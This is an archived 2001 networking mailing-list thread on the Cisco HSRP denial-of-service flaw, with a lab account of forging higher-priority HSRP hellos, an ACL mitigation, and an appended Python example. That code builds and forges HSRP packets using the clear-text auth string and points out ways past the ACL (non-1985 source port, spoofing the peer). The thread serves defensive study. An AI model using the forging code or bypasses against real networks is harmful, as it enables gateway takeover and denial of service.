I tried the HSRP access list from Brian (CCIE) and it works, (of course. ;-)

It was surprisingly easy to hack HSRP! :-[] I captured some HSRP packets 
with EtherPeek and edited one to say the packet was from my PC and that my 
priority was higher than the two legitimate HSRP routers. I then repeatedly 
sent this packet, using the timer that the legitimate HSRP routers were
using.

The standby HSRP router stopped sending HSRP packets (not sure why?). The 
previously active router made itself standby. PCs on the LAN that were set to use 
the HSRP gateway address were unable to reach non-local stations. The DoS 
worked, in other words. This is a lab network, by the way.

I used the access list below to make sure the HSRP routers only accepted HSRP 
packets from each other, and it solved the problem. I meant to save the 
HyperTerminal session and show you that the deny in the access list was 
getting invoked, but I forgot to save it.

Note one minor bug in the configs below:

It should say "ip access-group 100 in" (at least on my routers, the "ip" was 
required).

Priscilla

At 03:54 AM 5/8/01, Brian Dennis wrote:
>It's not the best solution but if you're really worried you could create an
>access-list (see configs below). HSRP uses UDP port 1985 and the destination
>address is to all routers (224.0.0.2). Perfect solution? No. Better than
>nothing? Yes.
>
>Brian Dennis, CCIE #2210 (R&S)(ISP/Dial) CCSI #98640
>5G Networks, Inc.
>[EMAIL PROTECTED]
>(925) 260-2724
>
>!
>hostname R1
>interface Ethernet 0
>  ip address 192.168.1.1 255.255.255.0
>  standby ip 192.168.1.254
>  standby authentication c!sc0b2b
>  access-group 100 in
>!
>access-list 100 permit udp host 192.168.1.2 eq 1985 host 224.0.0.2 eq 1985
>access-list 100 deny udp any eq 1985 any eq 1985
>access-list 100 permit ip any any
>
>
>!
>hostname R2
>!
>interface Ethernet 0
>  ip address 192.168.1.2 255.255.255.0
>  standby ip 192.168.1.254
>  standby authentication c!sc0b2b
>  access-group 100 in
>!
>access-list 100 permit udp host 192.168.1.1 eq 1985 host 224.0.0.2 eq 1985
>access-list 100 deny udp any eq 1985 any eq 1985
>access-list 100 permit ip any any
>
>
>
> > -----Original Message-----
> > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
> > Jacques Atlas
> > Sent: Monday, May 07, 2001 11:10 PM
> > To: [EMAIL PROTECTED]
> > Subject: RE: Cisco HSRP Denial of Service Vulnerability [7:3534]
> >
> >
> > On Tue, 8 May 2001, Curtis Call wrote:
> >
> > |In other words always use authentication.
> >
> > I don't think the authentication in clear text is going to help;
> > the solution from the vendor is to run HSRP with IPSec.
> >
> > --
> > jacques
> > FAQ, list archives, and subscription info:
> > http://www.groupstudy.com/list/cisco.html
> > Report misconduct and Nondisclosure violations to [EMAIL PROTECTED]


________________________

Priscilla Oppenheimer
http://www.priscilla.com
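The packet Priscilla edited and the filter Brian posted, as an added worked example (not code from either of them, and not from the thread): it builds and decodes an HSRP v1 hello using the RFC 2281 layout, shows that the authentication string travels in clear text and is simply copied into the forged packet, and models access-list 100 as applied on R1 to show what the filter does and does not stop. The attacker address 192.168.1.99 is a constructed value; the router, virtual IP and auth string are the ones from the quoted configs.

```python
"""HSRP v1 hello crafting, recovery of the clear-text auth string, and a
model of the access-list quoted in this thread.  Added example, not code
from the thread; the packet layout follows RFC 2281 and the attacker
address 192.168.1.99 is a constructed value."""
import ipaddress
import struct

# ver, opcode, state, hellotime, holdtime, priority, group, reserved, auth(8), virtual IP(4)
HSRP_FMT = "!8B8s4s"
HSRP_LEN = struct.calcsize(HSRP_FMT)          # 20 bytes
HSRP_PORT = 1985
ALL_ROUTERS = "224.0.0.2"
ATTACKER_IP = "192.168.1.99"                  # constructed, not from the thread
OPCODE = {0: "Hello", 1: "Coup", 2: "Resign"}
STATE = {0: "Initial", 1: "Learn", 2: "Listen", 4: "Speak", 8: "Standby", 16: "Active"}


def build_hsrp(priority, virtual_ip, auth="cisco", state=16, opcode=0,
               group=0, hellotime=3, holdtime=10):
    """Build a raw HSRP v1 payload (UDP data only; no IP/UDP headers)."""
    auth_field = auth.encode("ascii")[:8].ljust(8, b"\x00")   # clear text, zero padded
    return struct.pack(HSRP_FMT, 0, opcode, state, hellotime, holdtime, priority,
                       group, 0, auth_field, ipaddress.IPv4Address(virtual_ip).packed)


def parse_hsrp(payload):
    """Decode an HSRP v1 payload.  Anyone on the segment can do this, which is
    why the clear-text auth string adds no real protection."""
    if len(payload) < HSRP_LEN:
        raise ValueError("payload shorter than an HSRP v1 header")
    (ver, opcode, state, hello, hold, prio, group, _rsvd,
     auth, vip) = struct.unpack(HSRP_FMT, payload[:HSRP_LEN])
    return {
        "version": ver,
        "opcode": OPCODE.get(opcode, opcode),
        "state": STATE.get(state, state),
        "hellotime": hello,
        "holdtime": hold,
        "priority": prio,
        "group": group,
        "auth": auth.rstrip(b"\x00").decode("ascii", "replace"),
        "virtual_ip": str(ipaddress.IPv4Address(vip)),
    }


def forge_higher_priority(captured):
    """The edit described in the post: keep the captured timers, group, virtual
    IP and auth string, claim Active state and the maximum priority (255)."""
    f = parse_hsrp(captured)
    return build_hsrp(255, f["virtual_ip"], auth=f["auth"], state=16,
                      group=f["group"], hellotime=f["hellotime"], holdtime=f["holdtime"])


# access-list 100 as applied inbound on R1 (its HSRP peer is 192.168.1.2).
# Extended ACL semantics: first matching entry wins, implicit deny at the end.
ACL_R1 = [
    ("permit", "udp", "192.168.1.2", 1985, ALL_ROUTERS, 1985),
    ("deny",   "udp", "any",         1985, "any",       1985),
    ("permit", "ip",  "any",         None, "any",       None),
]


def acl_action(acl, proto, src_ip, src_port, dst_ip, dst_port):
    """Return 'permit' or 'deny' for one packet against an extended ACL."""
    for action, p, s, sp, d, dp in acl:
        if p != "ip" and p != proto:
            continue
        if (s in ("any", src_ip) and (sp is None or sp == src_port)
                and d in ("any", dst_ip) and (dp is None or dp == dst_port)):
            return action
    return "deny"                              # implicit deny


def filter_results():
    """Which senders get past R1's filter.  'spoofed' is the limit Brian pointed
    out: a forged packet carrying R2's source address matches the same permit
    entry as R2 itself.  'odd_sport' is a gap in the ACL as written: the deny
    entry only matches source port 1985."""
    return {
        "peer":      acl_action(ACL_R1, "udp", "192.168.1.2", HSRP_PORT, ALL_ROUTERS, HSRP_PORT),
        "attacker":  acl_action(ACL_R1, "udp", ATTACKER_IP, HSRP_PORT, ALL_ROUTERS, HSRP_PORT),
        "spoofed":   acl_action(ACL_R1, "udp", "192.168.1.2", HSRP_PORT, ALL_ROUTERS, HSRP_PORT),
        "odd_sport": acl_action(ACL_R1, "udp", ATTACKER_IP, 40000, ALL_ROUTERS, HSRP_PORT),
        "web":       acl_action(ACL_R1, "tcp", ATTACKER_IP, 40000, "192.168.1.1", 80),
    }


if __name__ == "__main__":
    legit = build_hsrp(100, "192.168.1.254", auth="c!sc0b2b")   # what R2 would send
    print(parse_hsrp(legit))
    print(parse_hsrp(forge_higher_priority(legit)))
    print(filter_results())
```

Two things worth checking against the model. First, the deny entry as quoted matches only packets with source port 1985; a hello sent from any other source port falls through to "permit ip any any". Whether IOS accepts a hello with a non-standard source port is not established in this thread, so the safer entry is one that does not depend on it, e.g. "access-list 100 deny udp any host 224.0.0.2 eq 1985". Second, no inbound ACL can tell a packet spoofed with the peer's address from the peer's own, which is Jacques's point: the filter raises the bar from "any host on the segment" to "any host willing to spoof a source address", and only authentication that cannot be copied from a capture closes that gap (later IOS releases added HSRP MD5 authentication, "standby authentication md5 key-string", for exactly this reason).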




Message Posted at:
http://www.groupstudy.com/form/read.php?f=7&i=3680&t=3534